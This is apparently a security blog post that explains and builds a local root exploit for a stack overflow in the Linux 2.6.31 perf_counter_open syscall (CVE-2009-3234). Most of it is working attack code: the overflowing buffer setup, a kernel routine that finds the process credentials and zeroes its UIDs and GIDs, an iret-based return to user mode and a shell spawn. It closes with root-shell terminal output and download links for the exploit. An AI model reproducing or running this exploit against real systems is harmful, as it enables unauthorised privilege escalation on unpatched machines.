Linux kernel 2.6.31 perf_counter

Well, it has been a while since my last technical post ... More than 1 year ?!? Wow, time runs so fast :)

So let's go for a post about Linux kernel exploitation (yeah, I know, sounds cool). We will exploit a quite recent bug in kernel 2.6.31 (still unpatched while writing this) in the perf_counter_open syscall (CVE 2009-3234) to gain root privileges. As real hackers say, f34R.

But, let's start by the begining: the bug.

perf_copy_attr and the dual fail

The perf_copy_attr method is meant to copy a data structure (of type perf_count_attr) from user space to kernel space. Its definition is:

static int perf_copy_attr(struct perf_counter_attr __user *uattr,
                          struct perf_counter_attr *attr)

With uattr being a pointer to the (source) user space structure, and attr being a pointer to the (destination) kernel space structure.

Here is the perf_copy_attr code:

static int perf_copy_attr(struct perf_counter_attr __user *uattr, struct perf_counter_attr *attr)
{
  [...]
  u32 size;
  [...]
  ret = get_user(size, &uattr->size);
  [...]
  /*
   * If we're handed a bigger struct than we know of,
   * ensure all the unknown bits are 0.
   */
  if (size > sizeof(*attr)) {
    unsigned long val;
    unsigned long __user *addr;
    unsigned long __user *end;

    addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr), sizeof(unsigned long));
    end  = PTR_ALIGN((void __user *)uattr + size, sizeof(unsigned long));

    for (; addr < end; addr += sizeof(unsigned long)) {
      ret = get_user(val, addr);
      if (ret)
        return ret;
      if (val)
        goto err_size;
    }
  }

  ret = copy_from_user(attr, uattr, size);
  [...]
}

Let's look at what is happening

First, size is copied from the user data :

ret = get_user(size, &uattr->size);

Then, size bytes from user buffer pointed by uattr are copied to kernel buffer pointed by attr:

ret = copy_from_user(attr, uattr, size);

This means that if the user supply uattr with uattr->size greater than the size of the buffer pointed by attr, the buffer will be overflowed. That's the first fail.

But in between lines 7 and 32, there is comment followed by a block of code. This comment says:

/*
 * If we're handed a bigger struct than we know of,
 * ensure all the unknown bits are 0.
 */

Without reading the code, you would think that you can overflow the buffer only with zeros, which, while not making the exploitation impossible, makes it more difficult. But, if you read the code, you will see this:

unsigned long __user *addr;

for (; addr < end; addr += sizeof(unsigned long)) {
        ret = get_user(val, addr);
        if (ret)
                return ret;
        if (val)
                goto err_size;
}

As pointer's arithmetic says that adding 1 to a pointer adds the size of the pointed value to the offset contained in the pointer, thus addr += sizeof(unsigned long) adds 4*4 to the offset contained in addr on a 32 bits system. This means that this loop checks that 1 long equals 0 every 4 longs.

That's the second fail

Exploitation

Note:

If you are not comfortable with stack based buffer overflow, you should first read this famous article from Aleph1: Smashing The Stack For Fun And Profit

The interesting thing for us is that perf_copy_attr is called directly from the perf_counter_open syscall and that the destination buffer is on the stack, so it's a typical stack based buffer overflow :

SYSCALL_DEFINE5(perf_counter_open,
                struct perf_counter_attr __user *, attr_uptr,
                pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
[...]
        struct perf_counter_attr attr;
[...]
        ret = perf_copy_attr(attr_uptr, &attr);
[...]

Now, let's have a look at the perf_counter_attr structure:

/*
 * Hardware event to monitor via a performance monitoring counter:
 */
struct perf_counter_attr {
        __u32                   type;
        __u32                   size;
[...] /* Total struct length: 64 bytes */

To trigger the overflow and modify the kernel code flow, we need to make an attr buffer so:

attr.size > sizeof(struct perf_counter_attr)
After the first 64 bytes of our buffer, we place zeroes so the loop in perf_copy_attr would not kick us
Rewrite the perf_counter_open return address located in the stack to our code

Modifying the kernel code flow

Note:

Before continuing, something you should remember is that the Linux kernel shares the address space of the process, so you can access to your process' memory from the kernel quite as easily as if you were accessing it from your program.

The following code is self-explanatory. We start by setting attr.size to 128, then the first loop fill the part of attr which will overflow with the address we want to jump to when in kernel-land, and the second loop puts 0s where needed so we will pass the loop test in perf_copy_attr. At the end, we just make a syscall to perf_counter_open.

#define SIZEOF_ATTR 64
#define BUFFER_LEN 128

void start()
{
        uint32_t *attr = malloc(BUFFER_LEN);
        uint32_t *stack_overflow = (void *)attr + SIZEOF_ATTR;
        uint32_t *aligned_overflow = PTR_ALIGN(stack_overflow, sizeof(unsigned long));

        memset(attr, 0, SIZEOF_ATTR);

        /* size is the second u32 in the struct */
        attr[1] = 128;

        while (stack_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
        {
                *stack_overflow = (uint32_t)kernel_code;
                stack_overflow ++;
        }

        /* then put 0s where we need them ... */
        while (aligned_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
        {
                *aligned_overflow = 0;
                aligned_overflow += 4;
        }

        syscall(__NR_perf_counter_open, attr, 0, 0, 0, 0);
}

So, if all wants well when the perf_counter_open function returns, the code flow should be redirected to our code and executed with kernel privileges (ring0).

The Kernel trip

What we need to do while in ring0 (kernel land), is to modify the credentials of our process to get the root privileges and exit the kernel. So, when back in ring3 (user land) we will start a shell from our process with the root privileges. We start by writing our kernel_code function as this:

void    kernel_code()
{
        update_cred();
        exit_kernel();
}

Upgrading credentials

Credentials of a process are stored in the task_struct. The task_struct is a huge structure holding everything about a process. The current process' task_struct address is always stored on top of the kernel stack - sizeof(long). The task_struct can be organised in different ways depending of kernel compilation options. So, even with the address of this structure, we cannot calculate to exact position of the credential-related fields. On latest kernel, credential are stored in cred structure pointed by the task_struct.

Here is how the task_struct links the credentials:

struct task_struct {
[...]
/* process credentials */
        const struct cred *real_cred;   /* objective and real subjective task
                                         * credentials (COW) */
        const struct cred *cred;        /* effective (overridable) subjective task
                                         * credentials (COW) */
[...]

And here is the cred structure:

struct cred {
        atomic_t        usage;
        uid_t           uid;            /* real UID of the task */
        gid_t           gid;            /* real GID of the task */
        uid_t           suid;           /* saved UID of the task */
        gid_t           sgid;           /* saved GID of the task */
        uid_t           euid;           /* effective UID of the task */
        gid_t           egid;           /* effective GID of the task */
        uid_t           fsuid;          /* UID for VFS ops */
        gid_t           fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
#ifdef CONFIG_KEYS
        unsigned char   jit_keyring;    /* default keyring to attach requested
                                         * keys to */
        struct key      *thread_keyring; /* keyring private to this thread */
        struct key      *request_key_auth; /* assumed request_key authority */
        struct thread_group_cred *tgcred; /* thread-group shared credentials */
#endif
#ifdef CONFIG_SECURITY
        void            *security;      /* subjective LSM security */
#endif
        struct user_struct *user;       /* real user ID subscription */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        struct rcu_head rcu;            /* RCU deletion hook */
};

As you may have noticed, task_struct links two cred structures. Under normal circumstances, the two pointers have the same value, thus pointing to the same cred structure.

This plus the very special definition of the cred structure having all the UIDs/GIDs side by side define a special signature. We will be able to find the cred structure's address by walking the task_struct searching for two field having the same exact value and looking like pointers to objects in the kernel memory space.

Then we will check if the pointed memory looks like a cred structure by looking at the UIDs/GIDs suite. When the cred structure will be found, we will just have to put 0s in the UIDs and GIDs to make our process have the root privileges.

Here is the code of our update_cred function:

static void update_cred()
{
        uint32_t        i;
        uint32_t        *task = get_current(); /* Pointer to the task_struct */
        uint32_t        *cred = 0;

        for (i = 0; i < 1024; i++)
        {
                cred = (uint32_t *)task[i];
                if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
                        cred++; /* Get ride of the cred's 'usage' field */
                        if (cred[0] == uid && cred[1] == gid
                            && cred[2] == uid && cred[3] == gid
                            && cred[4] == uid && cred[5] == gid
                            && cred[6] == uid && cred[7] == gid)
                        {
                                /* Get root */
                                cred[0] = cred[2] = cred[4] = cred[6] = 0;
                                cred[1] = cred[3] = cred[5] = cred[7] = 0;
                                break;
                        }
                }
        }
}

Well, we now need to go back to our process ...

Exiting kernel

Exiting kernel will not be difficult, all we have to do is to prepare the stack and call the iret instruction.

As defined in the Intel manuals, iret returns control to the program. When calling iret the processor pops data from the stack and place it in the EIP register, CS segment register, EFLAGS register, ESP register and finally SS segment register. The segment registers and EFLAGS will be set to "standard" value while we will give an address for ESP pointing to a memory buffer defined in our program (exit_stack), and the address of our spawn_shell function for EIP.

After the iret instruction will be executed we will be back in our program, at the start of the spawn_shell function, in user mode with the root's privileges.

Here is the code:

static void exit_kernel()
{
        __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (spawn_shell)
        );
}

Last, but not least ... spawning a shell !

Now, we are back in user land (ring3), and as we changed our stack address, and smashed some segment registers (like GS), we will not rely on the libc. So, we will start our shell in assembler.

It's quite simple: A syscall to write to print a message, and then a syscall to execve to start the shell;

spawn_shell:

static inline void spawn_shell()
{
        static char *s = "Starting shell\n";
        static char *t[] = {"/bin/sh", 0};

        my_syscall(SYS_write, 1, (unsigned int)s, mystrlen(s), 0, 0);
        my_syscall(SYS_execve, (unsigned int)*t, (unsigned int)t, 0, 0, 0);
}

my_syscall:

unsigned int my_syscall(unsigned int nb, unsigned int arg1, unsigned int arg2,
                        unsigned int arg3, unsigned int arg4, unsigned int arg5)
{
        unsigned int ret;
        __asm__ (
        "mov %1, %%eax ;"
        "mov %2, %%ebx ;"
        "mov %3, %%ecx ;"
        "mov %4, %%edx ;"
        "mov %5, %%esi ;"
        "mov %6, %%edi ;"
        "int $0x80 ;"
        "mov %%eax, %0 ;"
        : "=r" (ret)
        : "m" (nb), "m" (arg1), "m" (arg2), "m" (arg3), "m" (arg4), "m" (arg5)
        );
        return ret;
}

And we are done !

You should now have a root shell :) This is the result on a ubuntu jaunty host with a 2.6.31 kernel (from ubuntu repositories):

xipe@tomate:~/exploit$
xipe@tomate:~/exploit$ id
uid=1000(xipe) gid=1000(xipe) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
xipe@tomate:~/exploit$ ./sys_perf_counter_open_sploit
Starting shell
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
# uname -a
Linux tomate 2.6.31-10-generic #34-Ubuntu SMP Wed Sep 16 00:23:19 UTC 2009 i686 GNU/Linux
#

Exploit code

The exploit code and binary can be found here:: Download source

Download binary

That's all folks ! Have fun !

redstack

Linux kernel 2.6.31 perf_counter_open exploit